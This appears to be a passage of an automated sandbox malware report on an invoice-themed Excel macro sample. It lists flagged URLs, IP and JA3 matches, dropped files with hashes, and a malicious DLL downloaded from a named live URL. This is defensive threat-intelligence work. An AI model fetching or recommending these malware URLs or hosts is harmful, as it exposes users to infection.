                                                                                                                                                            https://email.utest.com/ls/click?upn=7pk4n7zyu3C81Mn1P-2FDmbQYiftB7Um69feDieyAcP67WG6G79-2FZJVKAlazUBAbfEF4GoDtXgPjNLWzDCnPh7Xakgzgk-2FmStvhSscVXayLFhZIIFZIYIscDWC3Iu-2BcY3A9omatVYEiWPK2Incpc6HzU578AM2hu6p-2Bn6uq0TcLQpocWZwdV9dCrqsMtrX-2FDi4HBg4XX4-2F3i2UkQ7nuJQrSo1-2FKKJZxdiMIvGfSPtt6AA-3D_Ps1_JjL7p1lgTUYZ5WQny2C5NjuXSDa0fPfjvfUw5EqzhcRvTxd-2F1XX8gbl7GK9SIE-2F651Ar7eNStX9JwifbMd-2Bpf6jPpjrN2U1igLfktYyJIQ-2Bml-2FEPkADqSRw-2Fi6D-2BnALXT-2B-2FvcMCA95hRIW-2FohWo93WXHSr3sm64NMmNmn7vCUVlwAUUBcpBMBuo-2FwDzI6vV-2FqVihNDaxiv67q2KreHoN-2B1iBGj-2FxyhjkJJWZIE1Jjos-3DGet hashmaliciousBrowse
                                                                                                                                                            • 104.18.11.39
                                                                                                                                                            https://email.utest.com/ls/click?upn=67aRGAcCFCvHxiPAckWKkhPC4KvHs6b-2F2weO-2F4bbSuzsR0S00yjD-2Bp98nxI8VUxFO-2BA-2FaoV7I7ejt7iWFdzNGQD7Rt-2B-2FrHigS8odmZ5jtBR1Jc-2F-2ByB20l8hXLQVEUsoKYNzQVntp2VlCibfgJJsmyTb3rVDsu9ejaUs6-2FrCmWTartaVeLsn0D92Hp7N17yWd7UqmLdwaGYREjE6axvHGamR7YgBj26o7dhrUoK-2BeTg4-3DlR5U_V3NU-2FA-2F-2BMCS01eqTEl7SwdC4Y1sHc0Ok-2BE-2BBcFuZa-2FMLGwVAklUo5zpn5w-2FWMCIp5-2FtPYdDyjonZQp2-2Fm-2FtoJqNBof8e11z4gErP9ujPflSfLTzXPNoDO4w6SdWItChamjCgpNcPi7T73NCj5Bg6ZnTadUi7N8-2BY2rrmnE5gpze1qYGwtCTwrD-2FEhq3HOVVSI6EgHrfbUqiGU0pY5jHFIJ3IDNrcPLgrZyFiYcyqRek-3DGet hashmaliciousBrowse
                                                                                                                                                            • 104.18.11.39
                                                                                                                                                            https://email.utest.com/ls/click?upn=LMh8OQWOikhQ4E8y-2BrYnz-2BbDB2TElaf90yCHoFAn4M1bYurbyYcloHeQnYwY0vQ7VDotXE-2F1AU3v6KKQKAvhhYV0UBWlqtuRNZJVtvX80VxChFCc1lzvSHIOg2vQaiTyT0IDnohwmvAyk6q7Lw7aV2oNzPp1SRnlWHFXN0qSB1ZgfLjV0g7BwyUNgRacGzLQzxxo4OCEX0IynXTekIdGpsnVH8RdeHbQN5hmkvqmAfMoOPsGKIXFuD2XjXmSQNwHQ8tj_OFYFW3aawQjHnZ2oUsm9aGRmiVDxWOGUeXvmswsU9xvx6eL-2F-2Facl5TxDb-2FnQAE-2F9WO-2BX1bZLZ3dQ6WwuATmPzz3S8NpXbPAjepyz5kRHvZa0CDmTSp0IhGs72hXqIXDMOuT72gd5GYA2W6rPcohuTqV3rAs0ui6xQJlDhswQEvrgqzCELYcSf4yeLy0GlPUnnpdaGlBorHCk0eM6B-2FWcFUAXo2t3fTe0C5AFZKARfK8-3DGet hashmaliciousBrowse
                                                                                                                                                            • 104.18.11.39
                                                                                                                                                            https://email.utest.com/ls/click?upn=pRtNAE4pBw306smbkBG7VfeIwBX2zq-2BxFGkc-2FYVg2kyteQhPgCyjFlF3g7Xm8OdsEJm4m-2Bb8v32fZo5G1S6IScPtZRx0O1qeslKL30HVUgu03CpTlmUlGG19oYXIdBdB3T-2BnneFUo-2FnuydTFtQrV-2FFD7ECFZ6-2BXjQduZf9kDgVI74LqkaeF5jfEKlvI9dNzmUWbncaLWs9jkPrQYRliwgvYISGRxPJ7a3gAUWZPRjDY-3DfCad_fQ8VNONEToroRqvq8M8IT71VVsbp-2FrVCPzMBywYUGjNEx5hFeS-2B3-2B0wfsC8rR2-2FcrAujDEHG74A-2FnVGsRRFxg-2FNYq0Ficj-2F6MNmWD3eD9hLtWuST0s8y4JgrbMq35uIiVx4-2FWXoquNFvepEkXYb-2BIIifvG1Hrrso0Hz938T8Kk2oqOiB-2BWIt73FfY6-2F7kAdcZlD9fseESOxt2IDwNJfsG-2BJ2dV9l2zjNB8qRR8WVLPs-3DGet hashmaliciousBrowse
                                                                                                                                                            • 104.18.11.39
                                                                                                                                                            https://email.utest.com/ls/click?upn=fuaIpvnsuSQILWwzYiXi5qnEApdA08gndIGt9eDXEUzb2D9ZQis83XJjquyQ-2B9NU6N6PUmNiYKL2-2B9K-2B0Q-2FRuNZV2Rm6EE3tP6uveKZcpGa39fA3R6q6mtnf0YazerOr3Wym2I-2B4EKphohsG9TZrR10vb4sAorg3TlmbMLBvyRhlhPfnKFPOumxhPEnjlTpz4URurYF2wvhUTU5FbrZwbgaLDFhKWhDuDmKVQ4MiqOgEAGo1wQlNp439PzN1eKX8UvDM_oB8tJkdbn8-2B0HmsO8J4iQplzftnfE-2B8k0a9q1EntRKkJu1B-2FCVgO526eX33TRFpJwAzeZS5KAS0tKKzRRvWnodl78aEsHhSxo91ApNyL4MdpCkbZLJkdQb12aN6YOUgsp7GPBut2ZGkQb0VPeuTR9sLawADBZxxcvvOm5C44mioeJoHe0qFQpD7j-2FkTjaJgMi4jWdYXYz6hdODOLE13y3HyL2fGbEXG3mHtm20h7Ry8-3DGet hashmaliciousBrowse
                                                                                                                                                            • 104.18.10.39
                                                                                                                                                            https://m365.eu.vadesecure.com/safeproxy/v4?f=xQsVwKRZoQHMcJWN90zqnir6G6pZJkmZJBUJoNEfoN5w0NIk94-OeCH1NldcAqKsz75KalR9dIZlPCJr1Ux0xQ&i=dKwbScfh0hAXC0Inkkq0sM5FeXPK9I7Ny4D2nAPOiEibKJwP2etJDqX8WzAoEu0mklzE6wT-r8I8OtTRdIg8Sg&k=EPqM&r=_vxI1MPLJP9RjHYc6dmEH2aQYLnm7iSEcU9gx_WNg2_vrJo8MeAqNzNCqHX9DNrQ&s=dbc75c7ed54466f34eeae3fd3b1612b20fb815efc99933570f78acd79467623c&u=https%3A%2F%2Femail.utest.com%2Fls%2Fclick%3Fupn%3DlGjzeq3i4yih7CYyWDD2uGWEioaO303Ya1CTzgGY6ZFHmgV-2FF-2FEWXdAYvLiLIvET2r-2BfuQ5qIL56xFMZkA-2F-2BXKhuWb2hSemZwMxFmG0rDjjP9tlrcROzWmQSAh2kMQamb79I1cx4-2Fvjhww3n8oZQi-2FnOhlQdbGdNxKrX28q7P-2FPufa0AAvr-2FvNJcD-2FrxpMHjDG9dPJU0WEGqi12uVZQLCz-2BjYAJF5yCzK-2FjUezEn2d6sv-2BTETl96ejjfG9yQ2VbdWqGp_snpiKdUCY2bDrEnMsWMAnz6f3HkWPd0oUIj3WsKz0V4NahNEm-2BJ9rDW2-2Fib8wsclxoRuHsrv-2B0aoCVw0ftXwGZJTPgQ4k6DZXQjAqFeejOYe-2FRbaSc1Yf5Xj5PUa6lKqmFYNWSkevePONwyMaBGxV4NDGtgMbAc7jyOEWYDUniHPiY87Lpiw631423FED14OvXIfrL7S45QvDvK6-2Fc04r-2B65lMxyCebYSr-2FOr4bCpGQ-3DGet hashmaliciousBrowse
                                                                                                                                                            • 104.18.10.39

                                                                                                                                                            ASN

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                            GD-EMEA-DC-SXB1DExad05r9ba.dllGet hashmaliciousBrowse
                                                                                                                                                            • 80.86.91.27
                                                                                                                                                            mcluc5u.dllGet hashmaliciousBrowse
                                                                                                                                                            • 80.86.91.27
                                                                                                                                                            INV2680371456-20210111889374.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 80.86.91.27
                                                                                                                                                            INV8073565781-20210111319595.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 80.86.91.27
                                                                                                                                                            HkNkyKl3uT.dllGet hashmaliciousBrowse
                                                                                                                                                            • 80.86.91.27
                                                                                                                                                            ceepq536n.zip.dllGet hashmaliciousBrowse
                                                                                                                                                            • 80.86.91.27
                                                                                                                                                            sample20210111-01.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 80.86.91.27
                                                                                                                                                            INV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 80.86.91.27
                                                                                                                                                            hiytvys.dllGet hashmaliciousBrowse
                                                                                                                                                            • 80.86.91.27
                                                                                                                                                            l7rgi3xyd.dllGet hashmaliciousBrowse
                                                                                                                                                            • 80.86.91.27
                                                                                                                                                            ymuyks.dllGet hashmaliciousBrowse
                                                                                                                                                            • 80.86.91.27
                                                                                                                                                            INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 80.86.91.27
                                                                                                                                                            hy9x6wzip.dllGet hashmaliciousBrowse
                                                                                                                                                            • 80.86.91.27
                                                                                                                                                            INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 80.86.91.27
                                                                                                                                                            jufk0vrar.dllGet hashmaliciousBrowse
                                                                                                                                                            • 80.86.91.27
                                                                                                                                                            s3CRQNulKZ.exeGet hashmaliciousBrowse
                                                                                                                                                            • 217.172.179.54
                                                                                                                                                            DFR2154747.vbeGet hashmaliciousBrowse
                                                                                                                                                            • 85.25.93.233
                                                                                                                                                            r8a97.exeGet hashmaliciousBrowse
                                                                                                                                                            • 62.75.168.106
                                                                                                                                                            NKsplucdAu.exeGet hashmaliciousBrowse
                                                                                                                                                            • 217.172.179.54
                                                                                                                                                            lZVNh1BPxm.exeGet hashmaliciousBrowse
                                                                                                                                                            • 217.172.179.54
                                                                                                                                                            OVHFRQT55.vbsGet hashmaliciousBrowse
                                                                                                                                                            • 51.89.204.178
                                                                                                                                                            VN55.vbsGet hashmaliciousBrowse
                                                                                                                                                            • 51.89.204.178
                                                                                                                                                            INVOICE-0966542R.exeGet hashmaliciousBrowse
                                                                                                                                                            • 178.33.222.241
                                                                                                                                                            VP57.vbsGet hashmaliciousBrowse
                                                                                                                                                            • 51.89.204.178
                                                                                                                                                            xad05r9ba.dllGet hashmaliciousBrowse
                                                                                                                                                            • 46.105.131.65
                                                                                                                                                            mcluc5u.dllGet hashmaliciousBrowse
                                                                                                                                                            • 46.105.131.65
                                                                                                                                                            INV2680371456-20210111889374.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 46.105.131.65
                                                                                                                                                            INV8073565781-20210111319595.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 46.105.131.65
                                                                                                                                                            HkNkyKl3uT.dllGet hashmaliciousBrowse
                                                                                                                                                            • 46.105.131.65
                                                                                                                                                            Doc_74657456348374.xlsxGet hashmaliciousBrowse
                                                                                                                                                            • 149.202.23.211
                                                                                                                                                            ceepq536n.zip.dllGet hashmaliciousBrowse
                                                                                                                                                            • 46.105.131.65
                                                                                                                                                            sample20210111-01.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 46.105.131.65
                                                                                                                                                            INV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 46.105.131.65
                                                                                                                                                            sfk_setup.exeGet hashmaliciousBrowse
                                                                                                                                                            • 54.39.133.136
                                                                                                                                                            hiytvys.dllGet hashmaliciousBrowse
                                                                                                                                                            • 46.105.131.65
                                                                                                                                                            l7rgi3xyd.dllGet hashmaliciousBrowse
                                                                                                                                                            • 46.105.131.65
                                                                                                                                                            ymuyks.dllGet hashmaliciousBrowse
                                                                                                                                                            • 46.105.131.65
                                                                                                                                                            Client.vbsGet hashmaliciousBrowse
                                                                                                                                                            • 92.222.182.237
                                                                                                                                                            INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 46.105.131.65
                                                                                                                                                            hy9x6wzip.dllGet hashmaliciousBrowse
                                                                                                                                                            • 46.105.131.65
                                                                                                                                                            SENTIANLxad05r9ba.dllGet hashmaliciousBrowse
                                                                                                                                                            • 5.100.228.233
                                                                                                                                                            mcluc5u.dllGet hashmaliciousBrowse
                                                                                                                                                            • 5.100.228.233
                                                                                                                                                            INV2680371456-20210111889374.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 5.100.228.233
                                                                                                                                                            INV8073565781-20210111319595.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 5.100.228.233
                                                                                                                                                            HkNkyKl3uT.dllGet hashmaliciousBrowse
                                                                                                                                                            • 5.100.228.233
                                                                                                                                                            ceepq536n.zip.dllGet hashmaliciousBrowse
                                                                                                                                                            • 5.100.228.233
                                                                                                                                                            sample20210111-01.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 5.100.228.233
                                                                                                                                                            INV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 5.100.228.233
                                                                                                                                                            hiytvys.dllGet hashmaliciousBrowse
                                                                                                                                                            • 5.100.228.233
                                                                                                                                                            l7rgi3xyd.dllGet hashmaliciousBrowse
                                                                                                                                                            • 5.100.228.233
                                                                                                                                                            ymuyks.dllGet hashmaliciousBrowse
                                                                                                                                                            • 5.100.228.233
                                                                                                                                                            INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 5.100.228.233
                                                                                                                                                            hy9x6wzip.dllGet hashmaliciousBrowse
                                                                                                                                                            • 5.100.228.233
                                                                                                                                                            INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 5.100.228.233
                                                                                                                                                            jufk0vrar.dllGet hashmaliciousBrowse
                                                                                                                                                            • 5.100.228.233
                                                                                                                                                            anthon.exeGet hashmaliciousBrowse
                                                                                                                                                            • 145.131.21.142
                                                                                                                                                            baf6b9fcec491619b45c1dd7db56ad3d.exeGet hashmaliciousBrowse
                                                                                                                                                            • 91.216.141.46
                                                                                                                                                            p8LV1eVFyO.exeGet hashmaliciousBrowse
                                                                                                                                                            • 91.216.141.46
                                                                                                                                                            IQtvZjIdhN.exeGet hashmaliciousBrowse
                                                                                                                                                            • 91.216.141.46
                                                                                                                                                            148wWoi8vI.exeGet hashmaliciousBrowse
                                                                                                                                                            • 91.216.141.46

                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                            7dcce5b76c8b17472d024758970a406bACH PAYMENT REMlTTANCE.xlsxGet hashmaliciousBrowse
                                                                                                                                                            • 104.27.153.52
                                                                                                                                                            FedEx 772584418730.docGet hashmaliciousBrowse
                                                                                                                                                            • 104.27.153.52
                                                                                                                                                            INV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 104.27.153.52
                                                                                                                                                            SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.18733.rtfGet hashmaliciousBrowse
                                                                                                                                                            • 104.27.153.52
                                                                                                                                                            PURCHASE ORDER-34002174.docGet hashmaliciousBrowse
                                                                                                                                                            • 104.27.153.52
                                                                                                                                                            SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.5396.rtfGet hashmaliciousBrowse
                                                                                                                                                            • 104.27.153.52
                                                                                                                                                            n#U00b0 761.docGet hashmaliciousBrowse
                                                                                                                                                            • 104.27.153.52
                                                                                                                                                            swift 0182021.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 104.27.153.52
                                                                                                                                                            Curriculo Laura.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 104.27.153.52
                                                                                                                                                            prints-eduardo-bolsonaro.docmGet hashmaliciousBrowse
                                                                                                                                                            • 104.27.153.52
                                                                                                                                                            Curriculo Laura.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 104.27.153.52
                                                                                                                                                            prints carlos bolsonaro.docmGet hashmaliciousBrowse
                                                                                                                                                            • 104.27.153.52
                                                                                                                                                            prints carlos bolsonaro.docmGet hashmaliciousBrowse
                                                                                                                                                            • 104.27.153.52
                                                                                                                                                            New PO.docGet hashmaliciousBrowse
                                                                                                                                                            • 104.27.153.52
                                                                                                                                                            Recibo de la transaccion.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 104.27.153.52
                                                                                                                                                            Xeron_Scan2021002111002.docGet hashmaliciousBrowse
                                                                                                                                                            • 104.27.153.52
                                                                                                                                                            INFO.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 104.27.153.52
                                                                                                                                                            SWIFT_075.dotmGet hashmaliciousBrowse
                                                                                                                                                            • 104.27.153.52
                                                                                                                                                            Order-Detail-17534.docGet hashmaliciousBrowse
                                                                                                                                                            • 104.27.153.52
                                                                                                                                                            Shipping Document PL and BL003534.pptGet hashmaliciousBrowse
                                                                                                                                                            • 104.27.153.52
                                                                                                                                                            eb88d0b3e1961a0562f006e5ce2a0b87INV2680371456-20210111889374.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 77.220.64.37
                                                                                                                                                            INV8073565781-20210111319595.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 77.220.64.37
                                                                                                                                                            INV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 77.220.64.37
                                                                                                                                                            INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 77.220.64.37
                                                                                                                                                            INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 77.220.64.37
                                                                                                                                                            Document74269.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 77.220.64.37
                                                                                                                                                            Document74269.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 77.220.64.37
                                                                                                                                                            1 Total New Invoices-Monday December 14 2020.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 77.220.64.37
                                                                                                                                                            1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 77.220.64.37
                                                                                                                                                            1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 77.220.64.37
                                                                                                                                                            1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 77.220.64.37
                                                                                                                                                            1-Total New Invoices Monday Dec 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 77.220.64.37
                                                                                                                                                            1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 77.220.64.37
                                                                                                                                                            1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 77.220.64.37
                                                                                                                                                            SecuriteInfo.com.Heur.15645.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 77.220.64.37
                                                                                                                                                            Statement_1857_of_12_09_2020.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 77.220.64.37
                                                                                                                                                            Statement_9505_of_12_09_2020.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 77.220.64.37
                                                                                                                                                            MSC printouts of outstanding as of 73221_12_09_2020.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 77.220.64.37
                                                                                                                                                            Invoice.29002611.docGet hashmaliciousBrowse
                                                                                                                                                            • 77.220.64.37
                                                                                                                                                            MSC printouts of outstanding as of 64338_12_09_2020.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 77.220.64.37

                                                                                                                                                            Dropped Files

                                                                                                                                                            No context

                                                                                                                                                            Created / dropped Files

                                                                                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
                                                                                                                                                            Process:C:\Windows\System32\DWWIN.EXE
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):914
                                                                                                                                                            Entropy (8bit):7.367371959019618
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:c0oGlGm7qGlGd7SK1tcudP5M/C0VQYyL4R3fum:+JnJ17tcudRMq6QsF
                                                                                                                                                            MD5:E4A68AC854AC5242460AFD72481B2A44
                                                                                                                                                            SHA1:DF3C24F9BFD666761B268073FE06D1CC8D4F82A4
                                                                                                                                                            SHA-256:CB3CCBB76031E5E0138F8DD39A23F9DE47FFC35E43C1144CEA27D46A5AB1CB5F
                                                                                                                                                            SHA-512:5622207E1BA285F172756F6019AF92AC808ED63286E24DFECC1E79873FB5D140F1CEB7133F2476E89A5F75F711F9813A9FBB8FD5287F64ADFDCC53B864F9BDC5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                            Preview: 0...0..v........:......(d.....0...*.H........0a1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1 0...U....DigiCert Global Root G20...130801120000Z..380115120000Z0a1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1 0...U....DigiCert Global Root G20.."0...*.H.............0.........7.4.{k.h..Ju.F.!.....T......:..<z...k.-.^.$D.b.~..~.Tu ..P..c.l0.............7...CN.{,.../..:...%.k.`.`.O!I..g..a......2k..W.].......I.5-..Im.w..IK..U......#.LmE.....0..LU.'JW.|...s...J...P.......!..........g(.s..=Fv...!4M..E..I.....3.).......B0@0...U.......0....0...U...........0...U......N"T ....n..........90...*.H.............`g(.o.Hc.1..g..}<.J...+.._sw*2.9.gB.#.Eg5....a.4.. L....5.v..B..D...6t$Z.l..Y5..I....G*=./.\... ._SF..h...0.>1.....>5.._..pPpGA.W.N......./.%.u...o..Aq..*.O. U...E..D..2...SF.,...".K..E....X..}R..YC....&.o....7}.....w_v.<..]V[..fn.57.2.
                                                                                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                                            Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                            File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):58936
                                                                                                                                                            Entropy (8bit):7.994797855729196
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                                                                                                            MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                                                                                                            SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                                                                                                            SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                                                                                                            SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                                            Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
                                                                                                                                                            Process:C:\Windows\System32\DWWIN.EXE
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):252
                                                                                                                                                            Entropy (8bit):3.09723161333692
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:kKRUpLDKVIbjcalgRAOAUSW0zeEpV1Ew1OXISMlcV/:JwLutWOxSW0zeYrsMlU/
                                                                                                                                                            MD5:AEC41C62F344451AF6BE3D04A4AD3094
                                                                                                                                                            SHA1:A890D05906731612A72AB63F90B0B9F0D16BA047
                                                                                                                                                            SHA-256:3F0E01BBF2031B41F0601EFD45730346E529CB6CEE6F92959EEC94F277EC34A0
                                                                                                                                                            SHA-512:2B0FB7C3B0EE287E23D37052D5C3C9D53441DC229D6014197F287E6CA64139D18FB7290B4E26571F7E4A077AED7D07989A93EDB4EEED6BE55F4CD38057C789EB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview: p...... ....j....T.E....(....................................................... ............n...u..................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.G.l.o.b.a.l.R.o.o.t.G.2...c.r.t...".5.a.2.8.6.4.1.7.-.3.9.2."...
                                                                                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                                            Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):326
                                                                                                                                                            Entropy (8bit):3.1231869637929046
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:kK+rwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:2QkPlE99SNxAhUegeT2
                                                                                                                                                            MD5:26C0ED9FA0004EB0BFEB3AEE6533A372
                                                                                                                                                            SHA1:D849F27AFE0DF2D0E72731A32EA80BC4B47EAF86
                                                                                                                                                            SHA-256:8F3FD30E7B20189BCAD9C1BC7D1DF5B9840DD1EF4F65010631A0D31A73208B9D
                                                                                                                                                            SHA-512:ABCFE4D2D6C0E056A3746E444C11F2F8A6008C5CDC4F82A0BF3159B2E615FDFB88DD387826DEC83B365DE446A5202F0DA6095A45F0A504EB0ABD11CD3CCFCE62
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview: p...... ........f_......(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\w80l82r[1].zip
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):319488
                                                                                                                                                            Entropy (8bit):7.125176562164236
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:5HdO040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B918juwUX:RdO02Srnh0qEJC+Y218jdU
                                                                                                                                                            MD5:597B02A17B8C012E25FA0A668004163B
                                                                                                                                                            SHA1:424A6F131D5C765EFDB28E5CAAE5FE2834A82BB0
                                                                                                                                                            SHA-256:E3F7EB34C3A1FD306C7788096CB666F3362BA5AA78710074B61DD03F829B8AFD
                                                                                                                                                            SHA-512:C75D875F3ABE620779380E7AE0F4BBB59B0C823B40889084B51396CD166187CBD90F7FB4159969DF1C7C241930BAA93BD051BF2F8FFF9CB8402D00CFB60062D4
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                            Reputation:low
                                                                                                                                                            IE Cache URL:https://education.scrollx.in/w80l82r.zip
                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:._...........!...2.z...b.......&.......@...............................@..........................................................|....................0.......................................................................................text....$.......&.................. ..`.rdata.......@.......*..............@..@.rdata3......P.......,..............@..@.2...........`.......0..............@..@.rdata2.6....p.......2..............@..@.data................4..............@....text4...R.......T...R.............. ..@.rsrc...|........0..................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2FECA1BF.emf
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1408
                                                                                                                                                            Entropy (8bit):2.270567557934206
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:YnLmlzslqWuMap0Fol9l+EeQpN4lZsrBKlQzKlsl0u17u1DtDAcqitLMk+QCeJHo:Ync9640CXV34gNqXK7KhDDYB
                                                                                                                                                            MD5:40550DC2F9D56285FA529159B8F2C6A5
                                                                                                                                                            SHA1:DD81D41D283D2881BEC77E00D773C7E8C0744DA3
